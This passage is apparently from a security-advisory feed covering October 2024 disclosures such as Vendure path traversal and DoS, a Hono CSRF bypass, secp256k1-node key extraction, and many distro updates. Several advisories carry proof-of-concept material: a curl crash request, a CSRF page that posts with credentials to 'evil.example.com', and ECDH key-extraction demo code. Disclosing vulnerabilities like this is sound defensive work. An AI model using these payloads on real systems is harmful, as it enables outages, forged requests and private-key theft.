If the vendure service is behind some server like nginx, apache, etc., path normalization is performed on the root server level, but still the actual client's request path will be sent to the vendure service and not the resultant normalized path. However, depending on the type of root server, one can try various payloads to bypass such normalization. The reporter found a customer website which uses the local asset plugin and, using the above mentioned vulnerability, was able to find secrets like email credentials.

## DOS via malformed URI

In the same code path is an additional vector for crashing the server via a malformed URI.

Again from Rajesh:

There is also a potential Denial of Service (DoS) issue when incorrectly encoded URI characters are passed as part of the asset URL. When these malformed requests are processed, they can lead to system crashes or resource exhaustion, rendering the service unavailable to users.

Exploit: `curl --path-as-is http://localhost:3000/assets/%80package.json`; here `%80` is not a valid url-encoded character, hence when decodeURIComponent is called on it, the entire app crashes.

```
[:server] /Users/abc/mywork/vendure/packages/asset-server-plugin/src/plugin.ts:353
[:server] const decodedReqPath = decodeURIComponent(req.path);
[:server] ^
[:server] URIError: URI malformed
```

### Patches

v3.0.5, v2.3.3

### Workarounds

- Use object storage rather than the local file system, e.g. MinIO or S3
- Define middleware which detects and blocks requests with urls containing `/../`

Link: https://secdb.nttzen.cloud/security-advisory/npm/NPM:GHSA-R9MQ-3C9R-FMJQ

15.10.2024 22:56:23 | npm | [NPM:GHSA-2234-FMW7-43WR] Hono allows bypass of CSRF Middleware by a request without Content-Type header. (moderate)

### Summary

Bypass CSRF Middleware by a request without a Content-Type header.

### Details

Although the csrf middleware verifies the Content-Type header, Hono always considers a request without a Content-Type header to be safe.

https://github.com/honojs/hono/blob/cebf4e87f3984a6a034e60a43f542b4c5225b668/src/middleware/csrf/index.ts#L76-L89

### PoC

```js
// server.js
import { Hono } from 'hono'
import { csrf } from 'hono/csrf'

const app = new Hono()
app.use(csrf())

app.get('/', (c) => {
  return c.html('Hello Hono!')
})
app.post('/', async (c) => {
  console.log("executed")
  return c.text(await c.req.text())
})

Deno.serve(app.fetch)
```

```html
<!-- PoC.html -->
<script>
async function myclick() {
  await fetch("http://evil.example.com", {
    method: "POST",
    credentials: "include",
    body: new Blob([`test`], {}),
  });
}
</script>
<input type="button" onclick="myclick()" value="run" />
```

Similarly, the fetch API does not add a Content-Type header for requests that do not include a body.

```js
// PoC2.js
await fetch("http://localhost:8000", {
  method: "POST",
  credentials: "include"
});
```

### Impact

Bypass of CSRF protection implemented with the Hono csrf middleware.

Link: https://secdb.nttzen.cloud/security-advisory/npm/NPM:GHSA-2234-FMW7-43WR

15.10.2024 18:23:06 | fedora | [FEDORA-2024-e717420659] Fedora 41: valkey (high)
Update to 8.0.1. Fixes:
- (CVE-2024-31449) Lua library commands may lead to stack overflow and potential RCE.
- (CVE-2024-31227) Potential Denial-of-service due to malformed ACL selectors.
- (CVE-2024-31228) Potential Denial-of-service due to unbounded pattern matching.
Link: https://secdb.nttzen.cloud/security-advisory/fedora/FEDORA-2024-e717420659

15.10.2024 18:23:04 | fedora | [FEDORA-2024-aebaa73b1f] Fedora 41: pdns-recursor (high)
Update to latest upstream
Link: https://secdb.nttzen.cloud/security-advisory/fedora/FEDORA-2024-aebaa73b1f

15.10.2024 22:56:17 | maven | [MAVEN:GHSA-CX95-Q6GX-W4QP] SAK-50571 Sakai Kernel users created with type roleview can login as a normal user (high)

### Impact

Illegal access can be granted to the system.

### References

See https://sakaiproject.atlassian.net/browse/SAK-50571

Link: https://secdb.nttzen.cloud/security-advisory/maven/MAVEN:GHSA-CX95-Q6GX-W4QP

15.10.2024 20:36:27 | npm | [NPM:GHSA-4WX3-54GH-9FR9] Cross site scripting in markdown-to-jsx (moderate)
Versions of the package markdown-to-jsx before 7.4.0 are vulnerable to Cross-site Scripting (XSS) via the src property due to improper input sanitization. An attacker can execute arbitrary code by injecting a malicious iframe element in the markdown.
Link: https://secdb.nttzen.cloud/security-advisory/npm/NPM:GHSA-4WX3-54GH-9FR9

15.10.2024 12:19:16 | almalinux | [ALSA-2024:8024] thunderbird security update (important)
thunderbird security update
Link: https://secdb.nttzen.cloud/security-advisory/almalinux/ALSA-2024:8024

15.10.2024 12:17:52 | almalinux | [ALSA-2024:8025] thunderbird security update (important)
thunderbird security update
Link: https://secdb.nttzen.cloud/security-advisory/almalinux/ALSA-2024:8025

15.10.2024 12:16:16 | almalinux | [ALSA-2024:8037] OpenIPMI security update (moderate)
OpenIPMI security update
Link: https://secdb.nttzen.cloud/security-advisory/almalinux/ALSA-2024:8037

15.10.2024 12:14:31 | almalinux | [ALSA-2024:8038] container-tools:rhel8 security update (important)
container-tools:rhel8 security update
Link: https://secdb.nttzen.cloud/security-advisory/almalinux/ALSA-2024:8038

15.10.2024 12:11:06 | almalinux | [ALSA-2024:8039] podman security update (important)
podman security update
Link: https://secdb.nttzen.cloud/security-advisory/almalinux/ALSA-2024:8039

15.10.2024 20:14:02 | npm | [NPM:GHSA-434G-2637-QMQR] Elliptic's verify function omits uniqueness validation (low)
The Elliptic package 6.5.5 for Node.js, in its EDDSA implementation, does not perform the required check that the signature proof(s) is within the bounds of the order n of the base point of the elliptic curve, leading to signature malleability. Namely, the `verify` function in `lib/elliptic/eddsa/index.js` omits the `sig.S().gte(sig.eddsa.curve.n) || sig.S().isNeg()` validation.
This vulnerability could have a security-relevant impact if an application relies on the uniqueness of a signature.
Link: https://secdb.nttzen.cloud/security-advisory/npm/NPM:GHSA-434G-2637-QMQR

17.10.2024 04:36:03 | fedora | [FEDORA-2024-112e897674] Fedora 40: python-virtualenv
Prevent command injection by quoting template strings in activation scripts
Link: https://secdb.nttzen.cloud/security-advisory/fedora/FEDORA-2024-112e897674

17.10.2024 04:35:57 | fedora | [FEDORA-2024-4ffc26d8cb] Fedora 40: dnsdist
Update to latest upstream
Link: https://secdb.nttzen.cloud/security-advisory/fedora/FEDORA-2024-4ffc26d8cb

17.10.2024 04:24:35 | fedora | [FEDORA-2024-f7d6b76677] Fedora 39: python-virtualenv
Prevent command injection by quoting template strings in activation scripts
Link: https://secdb.nttzen.cloud/security-advisory/fedora/FEDORA-2024-f7d6b76677

17.10.2024 04:24:31 | fedora | [FEDORA-2024-4d68c5928c] Fedora 39: dnsdist
Update to latest upstream
Link: https://secdb.nttzen.cloud/security-advisory/fedora/FEDORA-2024-4d68c5928c

16.10.2024 22:21:00 | slackware | [SSA:2024-290-02] mozilla-thunderbird

New mozilla-thunderbird packages are available for Slackware 15.0 to fix security issues.

**Here are the details from the Slackware 15.0 ChangeLog**

```
patches/packages/mozilla-thunderbird-115.16.1-i686-1_slack15.0.txz: Upgraded.
  This release contains security fixes and improvements.
  For more information, see:
    https://www.mozilla.org/en-US/thunderbird/115.16.1esr/releasenotes/
  (* Security fix *)
```

**Where to find the new packages**

Thanks to the friendly folks at the OSU Open Source Lab (http://osuosl.org) for donating FTP and rsync hosting to the Slackware project! :-)

Also see the "Get Slack" section on http://slackware.com for additional mirror sites near you.

Updated package for Slackware 15.0:
ftp://ftp.slackware.com/pub/slackware/slackware-15.0/patches/packages/mozilla-thunderbird-115.16.1-i686-1_slack15.0.txz

Updated package for Slackware x86_64 15.0:
ftp://ftp.slackware.com/pub/slackware/slackware64-15.0/patches/packages/mozilla-thunderbird-115.16.1-x86_64-1_slack15.0.txz

**MD5 signatures**

Slackware 15.0 package:
8a59459779943417ee2e97ffd735b265 mozilla-thunderbird-115.16.1-i686-1_slack15.0.txz

Slackware x86_64 15.0 package:
a8a842ba55a09b1f61571ca1cfe9b773 mozilla-thunderbird-115.16.1-x86_64-1_slack15.0.txz

**Installation instructions**

Upgrade the package as root:
`# upgradepkg mozilla-thunderbird-115.16.1-i686-1_slack15.0.txz`

Link: https://secdb.nttzen.cloud/security-advisory/slackware/SSA:2024-290-02

16.10.2024 22:15:56 | slackware | [SSA:2024-290-01] libssh2 (medium)

New libssh2 packages are available for Slackware 15.0 and -current to fix a security issue.

**Here are the details from the Slackware 15.0 ChangeLog**

```
patches/packages/libssh2-1.11.1-i586-1_slack15.0.txz: Upgraded.
  src: add 'strict KEX' to fix CVE-2023-48795 "Terrapin Attack."
  For more information, see:
    https://www.cve.org/CVERecord?id=CVE-2023-48795
  (* Security fix *)
```

**Where to find the new packages**

Thanks to the friendly folks at the OSU Open Source Lab (http://osuosl.org) for donating FTP and rsync hosting to the Slackware project! :-)

Also see the "Get Slack" section on http://slackware.com for additional mirror sites near you.

Updated package for Slackware 15.0:
ftp://ftp.slackware.com/pub/slackware/slackware-15.0/patches/packages/libssh2-1.11.1-i586-1_slack15.0.txz

Updated package for Slackware x86_64 15.0:
ftp://ftp.slackware.com/pub/slackware/slackware64-15.0/patches/packages/libssh2-1.11.1-x86_64-1_slack15.0.txz

Updated package for Slackware -current:
ftp://ftp.slackware.com/pub/slackware/slackware-current/slackware/l/libssh2-1.11.1-i686-1.txz

Updated package for Slackware x86_64 -current:
ftp://ftp.slackware.com/pub/slackware/slackware64-current/slackware64/l/libssh2-1.11.1-x86_64-1.txz

**MD5 signatures**

Slackware 15.0 package:
7f1f862a1753e93d5416a61aa8017078 libssh2-1.11.1-i586-1_slack15.0.txz

Slackware x86_64 15.0 package:
c340f1c1cca794b4766e9df27495b60a libssh2-1.11.1-x86_64-1_slack15.0.txz

Slackware -current package:
fe91d7142f14ca1f09ddd82db22544a8 l/libssh2-1.11.1-i686-1.txz

Slackware x86_64 -current package:
4e1ed4ddd560a4bb11daea68dd7e60d0 l/libssh2-1.11.1-x86_64-1.txz

**Installation instructions**

Upgrade the package as root:
`# upgradepkg libssh2-1.11.1-i586-1_slack15.0.txz`

Link: https://secdb.nttzen.cloud/security-advisory/slackware/SSA:2024-290-01

16.10.2024 19:00:00 | cisco | [CISCO-SA-UCSC-BKPSKY-TGJ5F73J] Cisco UCS Central Software Configuration Backup Information Disclosure Vulnerability (medium)
A vulnerability in the backup feature of Cisco UCS Central Software could allow an attacker with access to a backup file to learn sensitive information that is stored in the full state and configuration backup files.
This vulnerability is due to a weakness in the encryption method that is used for the backup function. An attacker could exploit this vulnerability by accessing a backup file and leveraging a static key that is used for the backup configuration feature. A successful exploit could allow an attacker with access to a backup file to learn sensitive information that is stored in full state backup files and configuration backup files, such as local user credentials, authentication server passwords, Simple Network Management Protocol (SNMP) community names, and the device SSL server certificate and key.
Cisco has released software updates that address this vulnerability. There are no workarounds that address this vulnerability.
Link: https://secdb.nttzen.cloud/security-advisory/cisco/CISCO-SA-UCSC-BKPSKY-TGJ5F73J

16.10.2024 19:00:00cisco[CISCO-SA-CCMPDM-RXSS-TAX76U3K] Cisco Unified Contact Center Management Portal Reflected Cross-Site Scripting Vulnerability (medium)A vulnerability in the web-based management interface of Cisco Unified Contact Center Management Portal (Unified CCMP) could allow an unauthenticated, remote attacker to conduct a reflected cross-site scripting (XSS) attack against a user of the interface.This vulnerability exists because the web-based management interface does not properly validate user-supplied input. An attacker could exploit this vulnerability by persuading a user of the interface to click a crafted link. A successful exploit could allow the attacker to execute arbitrary script code in the context of the affected interface or access sensitive browser-based information.Cisco has released software updates that address this vulnerability. There are no workarounds that address this vulnerability.https://secdb.nttzen.cloud/security-advisory/cisco/CISCO-SA-CCMPDM-RXSS-TAX76U3K
16.10.2024 19:00:00cisco[CISCO-SA-ATA19X-MULTI-RDTEQRSY] Cisco ATA 190 Series Analog Telephone Adapter Firmware Vulnerabilities (high)Multiple vulnerabilities in Cisco ATA 190 Series Analog Telephone Adapter firmware, both on-premises and multiplatform, could allow a remote attacker to delete or change the configuration, execute commands as the root user, conduct a cross-site scripting (XSS) attack against a user of the interface, view passwords, conduct a cross-site request forgery (CSRF) attack, or reboot the device.For more information about these vulnerabilities, see the Details ["#details"] section of this advisory.Cisco has released firmware updates that address these vulnerabilities. There are no workarounds that address these vulnerabilities. However, there is a mitigation that addresses some of these vulnerabilities for Cisco ATA 191 on-premises firmware only.https://secdb.nttzen.cloud/security-advisory/cisco/CISCO-SA-ATA19X-MULTI-RDTEQRSY
16.10.2024 22:25:49maven[MAVEN:GHSA-MJVF-4H88-6XM3] Improper Authentication vulnerability in Apache Solr (critical)Solr instances using the PKIAuthenticationPlugin, which is enabled by default when Solr Authentication is used, are vulnerable to Authentication bypass. A fake ending at the end of any Solr API URL path will allow requests to skip Authentication while maintaining the API contract with the original URL Path. This fake ending looks like an unprotected API path; however, it is stripped off internally after authentication but before API routing.This issue affects Apache Solr: from 5.3.0 before 8.11.4, from 9.0.0 before 9.7.0.Users are recommended to upgrade to version 9.7.0, or 8.11.4, which fix the issue.https://secdb.nttzen.cloud/security-advisory/maven/MAVEN:GHSA-MJVF-4H88-6XM3
16.10.2024 22:26:04maven[MAVEN:GHSA-H7W9-C5VX-X7J3] Insecure Default Initialization of Resource vulnerability in Apache Solr (high)New ConfigSets that are created via a Restore command, which copy a configSet from the backup and give it a new name, are created without setting the "trusted" metadata.ConfigSets that do not contain the flag are trusted implicitly if the metadata is missing, therefore this leads to "trusted" ConfigSets that may not have been created with an Authenticated request."trusted" ConfigSets are able to load custom code into classloaders, therefore the flag is supposed to only be set when the request that uploads the ConfigSet is Authenticated & Authorized.This issue affects Apache Solr: from 6.6.0 before 8.11.4, from 9.0.0 before 9.7.0. This issue does not affect Solr instances that are secured via Authentication/Authorization.Users are primarily recommended to use Authentication and Authorization when running Solr. However, upgrading to version 9.7.0, or 8.11.4 will mitigate this issue otherwise.https://secdb.nttzen.cloud/security-advisory/maven/MAVEN:GHSA-H7W9-C5VX-X7J3
16.10.2024 15:49:35rubysec[RUBYSEC:ACTIONMAILER-2024-47889] Possible ReDoS vulnerability in block_format in Action MailerThere is a possible ReDoS vulnerability in the block_format helper in Action Mailer. This vulnerability has been assigned the CVE identifier CVE-2024-47889.## ImpactCarefully crafted text can cause the block_format helper to take an unexpected amount of time, possibly resulting in a DoS vulnerability. All users running an affected release should either upgrade or apply the relevant patch immediately.Ruby 3.2 has mitigations for this problem, so Rails applications using Ruby 3.2 or newer are unaffected. Rails 8.0.0.beta1 requires Ruby 3.2 or greater so is unaffected.## ReleasesThe fixed releases are available at the normal locations.## WorkaroundsUsers can avoid calling the `block_format` helper or upgrade to Ruby 3.2.## CreditsThanks to [ooooooo_q](https://hackerone.com/ooooooo_q) for the report!https://secdb.nttzen.cloud/security-advisory/rubysec/RUBYSEC:ACTIONMAILER-2024-47889
16.10.2024 15:49:35rubysec[RUBYSEC:ACTIONPACK-2024-41128] Possible ReDoS vulnerability in query parameter filtering in Action DispatchThere is a possible ReDoS vulnerability in the query parameter filtering routines of Action Dispatch. This vulnerability has been assigned the CVE identifier CVE-2024-41128.## ImpactCarefully crafted query parameters can cause query parameter filtering to take an unexpected amount of time, possibly resulting in a DoS vulnerability. All users running an affected release should either upgrade or apply the relevant patch immediately.Ruby 3.2 has mitigations for this problem, so Rails applications using Ruby 3.2 or newer are unaffected. Rails 8.0.0.beta1 depends on Ruby 3.2 or greater so is unaffected.## ReleasesThe fixed releases are available at the normal locations.## WorkaroundsUsers on Ruby 3.2 are unaffected by this issue.## CreditsThanks to [scyoon](https://hackerone.com/scyoon) for the report and patches!https://secdb.nttzen.cloud/security-advisory/rubysec/RUBYSEC:ACTIONPACK-2024-41128
16.10.2024 15:49:35rubysec[RUBYSEC:ACTIONPACK-2024-47887] Possible ReDoS vulnerability in HTTP Token authentication in Action ControllerThere is a possible ReDoS vulnerability in Action Controller's HTTP Token authentication. This vulnerability has been assigned the CVE identifier CVE-2024-47887.## ImpactFor applications using HTTP Token authentication via `authenticate_or_request_with_http_token` or similar, a carefully crafted header may cause header parsing to take an unexpected amount of time, possibly resulting in a DoS vulnerability. All users running an affected release should either upgrade or apply the relevant patch immediately.Ruby 3.2 has mitigations for this problem, so Rails applications using Ruby 3.2 or newer are unaffected. Rails 8.0.0.beta1 depends on Ruby 3.2 or greater so is unaffected.## ReleasesThe fixed releases are available at the normal locations.## WorkaroundsUsers on Ruby 3.2 are unaffected by this issue.## CreditsThanks to [scyoon](https://hackerone.com/scyoon) for reportinghttps://secdb.nttzen.cloud/security-advisory/rubysec/RUBYSEC:ACTIONPACK-2024-47887
16.10.2024 15:49:35rubysec[RUBYSEC:ACTIONTEXT-2024-47888] Possible ReDoS vulnerability in plain_text_for_blockquote_node in Action TextThere is a possible ReDoS vulnerability in the plain_text_for_blockquote_node helper in Action Text. This vulnerability has been assigned the CVE identifier CVE-2024-47888.## ImpactCarefully crafted text can cause the plain_text_for_blockquote_node helper to take an unexpected amount of time, possibly resulting in a DoS vulnerability. All users running an affected release should either upgrade or apply the relevant patch immediately.Ruby 3.2 has mitigations for this problem, so Rails applications using Ruby 3.2 or newer are unaffected. Rails 8.0.0.beta1 depends on Ruby 3.2 or greater so is unaffected.## ReleasesThe fixed releases are available at the normal locations.## WorkaroundsUsers can avoid calling `plain_text_for_blockquote_node` or upgrade to Ruby 3.2.## CreditsThanks to [ooooooo_q](https://hackerone.com/ooooooo_q) for the report!https://secdb.nttzen.cloud/security-advisory/rubysec/RUBYSEC:ACTIONTEXT-2024-47888
16.10.2024 13:11:51almalinux[ALSA-2024:8112] buildah security update (important)buildah security updatehttps://secdb.nttzen.cloud/security-advisory/almalinux/ALSA-2024:8112
17.10.2024 15:33:36suse[SUSE-SU-2024:3711-1] Security update for cups-filters (critical)Security update for cups-filtershttps://secdb.nttzen.cloud/security-advisory/suse/SUSE-SU-2024:3711-1
18.10.2024 02:22:43pypi[PYSEC-2024-109] deepspeed vulnerability (high)DeepSpeed Remote Code Execution Vulnerabilityhttps://secdb.nttzen.cloud/security-advisory/pypi/PYSEC-2024-109
19.10.2024 04:54:40fedora[FEDORA-2024-80e4603b92] Fedora 40: libarchiveFix for CVE-2024-48957Automatic update for libarchive-3.7.2-6.fc40.https://secdb.nttzen.cloud/security-advisory/fedora/FEDORA-2024-80e4603b92
19.10.2024 04:54:35fedora[FEDORA-2024-bf524bf5c0] Fedora 40: rust-hyper-rustls, rust-tonic, rust-tonic-build, rust-tonic-types, rust-tower & 6 moreUpdate the hyper-rustls crate to version 0.27.3.Update the reqwest crate to version 0.12.8.Update the rustls-native-certs crate to version 0.8.0 and add a compat package for version 0.7.Update the tonic, tonic-build, and tonic-types crates to version 0.12.3.Update the tower crate to version 0.5.1 and add a compat package for version 0.4.Update the tower-http crate to version 0.6.1 and add a compat package for version 0.5.https://secdb.nttzen.cloud/security-advisory/fedora/FEDORA-2024-bf524bf5c0
19.10.2024 04:54:32fedora[FEDORA-2024-cb2e1f0168] Fedora 40: oath-toolkitThis is new version fixing possible local privilege escalation.https://secdb.nttzen.cloud/security-advisory/fedora/FEDORA-2024-cb2e1f0168
19.10.2024 04:54:22fedora[FEDORA-2024-f7a5b49a73] Fedora 40: libdigidocppUpstream release of libdigidocpphttps://secdb.nttzen.cloud/security-advisory/fedora/FEDORA-2024-f7a5b49a73
19.10.2024 04:20:53fedora[FEDORA-2024-ff98facbc6] Fedora 39: rust-reqwest, rust-hyper-rustls, rust-tonic, rust-tower-http0.5, rust-tonic-build & 6 moreUpdate the hyper-rustls crate to version 0.27.3.Update the reqwest crate to version 0.12.8.Update the rustls-native-certs crate to version 0.8.0 and add a compat package for version 0.7.Update the tonic, tonic-build, and tonic-types crates to version 0.12.3.Update the tower crate to version 0.5.1 and add a compat package for version 0.4.Update the tower-http crate to version 0.6.1 and add a compat package for version 0.5.https://secdb.nttzen.cloud/security-advisory/fedora/FEDORA-2024-ff98facbc6
19.10.2024 04:20:50fedora[FEDORA-2024-18ac02a385] Fedora 39: thunderbirdUpdate to 115.16.0https://www.thunderbird.net/en-US/thunderbird/115.16.0esr/releasenotes/https://secdb.nttzen.cloud/security-advisory/fedora/FEDORA-2024-18ac02a385
19.10.2024 04:20:48fedora[FEDORA-2024-dad1d2b46a] Fedora 39: oath-toolkitThis is new version fixing possible local privilege escalation.https://secdb.nttzen.cloud/security-advisory/fedora/FEDORA-2024-dad1d2b46a
19.10.2024 04:20:29fedora[FEDORA-2024-2ba00c906c] Fedora 39: unboundFixed builds on F41. Fixes CVE-2024-8508https://github.com/NLnetLabs/unbound/releases/tag/release-1.21.1https://secdb.nttzen.cloud/security-advisory/fedora/FEDORA-2024-2ba00c906c
18.10.2024 23:19:19maven[MAVEN:GHSA-4GC7-5J7H-4QPH] Spring Framework DataBinder Case Sensitive Match Exception (low)The fix for CVE-2022-22968 made disallowedFields patterns in DataBinder case insensitive. However, String.toLowerCase() has some Locale dependent exceptions that could potentially result in fields not protected as expected.https://secdb.nttzen.cloud/security-advisory/maven/MAVEN:GHSA-4GC7-5J7H-4QPH
18.10.2024 12:40:19almalinux[ALSA-2024:8117] java-1.8.0-openjdk security update (moderate)java-1.8.0-openjdk security updatehttps://secdb.nttzen.cloud/security-advisory/almalinux/ALSA-2024:8117
18.10.2024 12:37:55almalinux[ALSA-2024:8121] java-11-openjdk security update (moderate)java-11-openjdk security updatehttps://secdb.nttzen.cloud/security-advisory/almalinux/ALSA-2024:8121
18.10.2024 12:31:21almalinux[ALSA-2024:8124] java-17-openjdk security update (moderate)java-17-openjdk security updatehttps://secdb.nttzen.cloud/security-advisory/almalinux/ALSA-2024:8124
18.10.2024 12:27:13almalinux[ALSA-2024:8127] java-21-openjdk security update (moderate)java-21-openjdk security updatehttps://secdb.nttzen.cloud/security-advisory/almalinux/ALSA-2024:8127
18.10.2024 12:22:49almalinux[ALSA-2024:8180] webkit2gtk3 security update (important)webkit2gtk3 security updatehttps://secdb.nttzen.cloud/security-advisory/almalinux/ALSA-2024:8180
18.10.2024 03:00:00freebsd[FREEBSD:815BF172-AB9E-4C4B-9662-D18B0054330D] electron{31,32} -- multiple vulnerabilitiesElectron developers report: This update fixes the following vulnerabilities: Security: backported fix for CVE-2024-9602. Security: backported fix for CVE-2024-9603.https://secdb.nttzen.cloud/security-advisory/freebsd/FREEBSD:815BF172-AB9E-4C4B-9662-D18B0054330D
20.10.2024 03:54:53fedora[FEDORA-2024-c0b1d26de3] Fedora 39: chromiumUpdate to 130.0.6723.58 * High CVE-2024-9954: Use after free in AI * Medium CVE-2024-9955: Use after free in Web Authentication * Medium CVE-2024-9956: Inappropriate implementation in Web Authentication * Medium CVE-2024-9957: Use after free in UI * Medium CVE-2024-9958: Inappropriate implementation in PictureInPicture * Medium CVE-2024-9959: Use after free in DevTools * Medium CVE-2024-9960: Use after free in Dawn * Medium CVE-2024-9961: Use after free in Parcel Tracking * Medium CVE-2024-9962: Inappropriate implementation in Permissions * Medium CVE-2024-9963: Insufficient data validation in Downloads * Low CVE-2024-9964: Inappropriate implementation in Payments * Low CVE-2024-9965: Insufficient data validation in DevTools * Low CVE-2024-9966: Inappropriate implementation in Navigationshttps://secdb.nttzen.cloud/security-advisory/fedora/FEDORA-2024-c0b1d26de3
20.10.2024 03:54:39fedora[FEDORA-2024-5d581b2365] Fedora 39: apache-commons-ioFixes possible denial of service attack on untrusted inputhttps://secdb.nttzen.cloud/security-advisory/fedora/FEDORA-2024-5d581b2365
20.10.2024 01:49:39fedora[FEDORA-2024-5a61a2fa45] Fedora 41: buildah, containers-common, podmanAutomatic update for buildah-1.37.5-1.fc41.Changelog for buildah* Fri Oct 18 2024 Packit <hello(a)packit.dev> - 2:1.37.5-1- Update to 1.37.5 upstream releaseFixes CVE-2024-9341, CVE-2024-9675 and CVE-2024-9676.bugfixhttps://secdb.nttzen.cloud/security-advisory/fedora/FEDORA-2024-5a61a2fa45
19.10.2024 04:55:17fedora[FEDORA-2024-4d80983af6] Fedora 40: chromiumUpdate to 130.0.6723.58 * High CVE-2024-9954: Use after free in AI * Medium CVE-2024-9955: Use after free in Web Authentication * Medium CVE-2024-9956: Inappropriate implementation in Web Authentication * Medium CVE-2024-9957: Use after free in UI * Medium CVE-2024-9958: Inappropriate implementation in PictureInPicture * Medium CVE-2024-9959: Use after free in DevTools * Medium CVE-2024-9960: Use after free in Dawn * Medium CVE-2024-9961: Use after free in Parcel Tracking * Medium CVE-2024-9962: Inappropriate implementation in Permissions * Medium CVE-2024-9963: Insufficient data validation in Downloads * Low CVE-2024-9964: Inappropriate implementation in Payments * Low CVE-2024-9965: Insufficient data validation in DevTools * Low CVE-2024-9966: Inappropriate implementation in Navigationshttps://secdb.nttzen.cloud/security-advisory/fedora/FEDORA-2024-4d80983af6
21.10.2024 22:09:45npm[NPM:GHSA-584Q-6J8J-R5PM] secp256k1-node allows private key extraction over ECDH (high)### SummaryIn `elliptic`-based version, `loadUncompressedPublicKey` has a check that the public key is on the curve: https://github.com/cryptocoinjs/secp256k1-node/blob/6d3474b81d073cc9c8cc8cfadb580c84f8df5248/lib/elliptic.js#L37-L39`loadCompressedPublicKey` is, however, missing that check: https://github.com/cryptocoinjs/secp256k1-node/blob/6d3474b81d073cc9c8cc8cfadb580c84f8df5248/lib/elliptic.js#L17-L19That allows the attacker to use public keys on low-cardinality curves to extract enough information to fully restore the private key from as little as 11 ECDH sessions, and very cheaply on compute powerOther operations on public keys are also affected, including e.g. `publicKeyVerify()` incorrectly returning `true` on those invalid keys, and e.g. `publicKeyTweakMul()` also returning predictable outcomes allowing to restore the tweak ### DetailsThe curve equation is `Y^2 = X^3 + 7`, and it restores `Y` from `X` in `loadCompressedPublicKey`, using `Y = sqrt(X^3 + 7)`, but when there are no valid `Y` values satisfying `Y^2 = X^3 + 7` for a given `X`, the same code calculates a solution for `-Y^2 = X^3 + 7`, and that solution also satisfies some other equation `Y^2 = X^3 + D`, where `D` is not equal to 7 and might be on a curve with factorizable cardinality, so `(X,Y)` might be a low-order point on that curve, lowering the number of possible ECDH output values to bruteforcableThose output values correspond to remainders which can be then combined with Chinese remainder theorem to restore the original valueEndomorphism-based multiplication only slightly hinders restoration and does not affect the fact that the result is low-order10 different malicious X values could be chosen so that the overall extracted information is 238.4 bits out of 256 bit private key, and the rest is trivially bruteforcable with an additional 11th public key (which might be valid or not -- not significant)The attacker does not need to _receive_ the ECDH value, they only need to be able to confirm it against a list of possible candidates, e.g. check if using it to decipher block/stream cipher would work -- and that could all be done locally on the attacker side### PoC#### Example public keyThis key has order 39One of the possible outcomes for it is a throw, 38 are predictable ECDH valuesKeys used in full attack have higher order (starting from ~20000), so are very unlikely to cause an error```jsimport secp256k1 from 'secp256k1/elliptic.js'import { randomBytes } from 'crypto'const pub = Buffer.from('028ac57f9c6399282773c116ef21f7394890b6140aa6f25c181e9a91e2a9e3da45', 'hex')const seen = new Set()for (let i = 0; i < 1000; i++) { try { seen.add(Buffer.from(secp256k1.ecdh(pub, randomBytes(32))).toString('hex')) } catch { seen.add('failure also is an outcome') }}console.log(seen.size) // 39```#### Full attackThis PoC doesn't list the exact public keys or the code for `solver.js` intentionally, but this exact code works, on arbitrary random private keys:```js// Only the elliptic version is affected, gyp one isn't// Node.js can use both, Web/RN/bundles always use the elliptic versionimport secp256k1 from 'secp256k1/elliptic.js'import { randomBytes } from 'node:crypto'import assert from 'node:assert/strict'import { Solver } from './solver.js'const privateKey = randomBytes(32)// The full dataset is precomputed on a single MacBook Air in a few days and can be reused for any private keyconst solver = new Solver// We need to run on 10 specially crafted public keys for this// Lower than 10 is possible but requires more computefor (let i = 0; i < 10; i++) { const letMeIn = solver.ping() // this is a normal 33-byte Uint8Array, a 02/03-prefixed compressed public key assert(letMeIn instanceof Uint8Array) // true assert(secp256k1.publicKeyVerify(letMeIn)) // true // Returning ecdh value is not necessary but is used in this demo for simplicity // Solver needs to _confirm_ an ecdh value against a set of precalculated known ones, // which can be done even after it's hashed or used e.g. for a stream/block cipher, based on the encrypted data solver.callback(secp256k1.ecdh(letMeIn, privateKey)) // Btw we have those precomputed so we can actually use those sessions to lower suspicion, most -- instantly}// Now, we need a single valid (or another invalid) public key to recheck things against// It can be anything, e.g. we can specify an 11th one, or create a valid one and use it// We'll be able to confirm/restore and use the ecdh value for this session too upon privateKey extractionconst anyPublicKey = secp256k1.publicKeyCreate(randomBytes(32))assert(secp256k1.publicKeyVerify(anyPublicKey)) // true (obviously)// Full complexity of this exploit requires solver to perform ~ 2^35 ecdh value checks (for all 10 keys combined),// which is ~ 1 TiB -- that can be done offline and does not require any further interaction with the target// The exact speed of the comparison step depends on how the ecdh values are used, but is not very significant// Direct non-indexed linear scan over all possible (precomputed) values takes <10 minutes on a MacBook Air// Confirming against e.g. cipher output would be somewhat slower, but still definitely possible + also could be precomputedconst extracted = solver.stab(anyPublicKey, secp256k1.ecdh(anyPublicKey, privateKey))console.log(`Extracted private key: ${extracted.toString('hex')}`)console.log(`Actual private key was: ${privateKey.toString('hex')}`)assert(extracted.toString('hex') === privateKey.toString('hex'))console.log('Oops')```Result:```consoleExtracted private key: e3370b1e6726a6ceaa51a2aacf419e25244e0cde08596780da021b238b74df3dActual private key was: e3370b1e6726a6ceaa51a2aacf419e25244e0cde08596780da021b238b74df3dOopsnode example.js 178.80s user 13.59s system 74% cpu 4:17.01 total```### ImpactRemote private key is extracted over 11 ECDH sessionsThe attack is very low-cost, precompute took a few days on a single MacBook Air, and extraction takes ~10 minutes on the same MacBook AirAlso:* `publicKeyVerify()` misreports malicious public keys as valid* Same affects tweak extraction from `publicKeyTweakMul` result and other public key operationshttps://secdb.nttzen.cloud/security-advisory/npm/NPM:GHSA-584Q-6J8J-R5PM
21.10.2024 15:38:15ubuntu[USN-7062-2] libgsf vulnerabilities (high)libgsf could be made to run programs as your login if it opened a specially crafted file.https://secdb.nttzen.cloud/security-advisory/ubuntu/USN-7062-2
21.10.2024 15:33:17ubuntu[USN-7042-3] cups-browsed vulnerability (medium)cups-browsed could be made to run programs if it received specially crafted network traffic.https://secdb.nttzen.cloud/security-advisory/ubuntu/USN-7042-3
23.10.2024 04:34:22fedora[FEDORA-2024-8b08786765] Fedora 40: suricataVarious security, performance, accuracy, and stability issues have been fixed.https://secdb.nttzen.cloud/security-advisory/fedora/FEDORA-2024-8b08786765
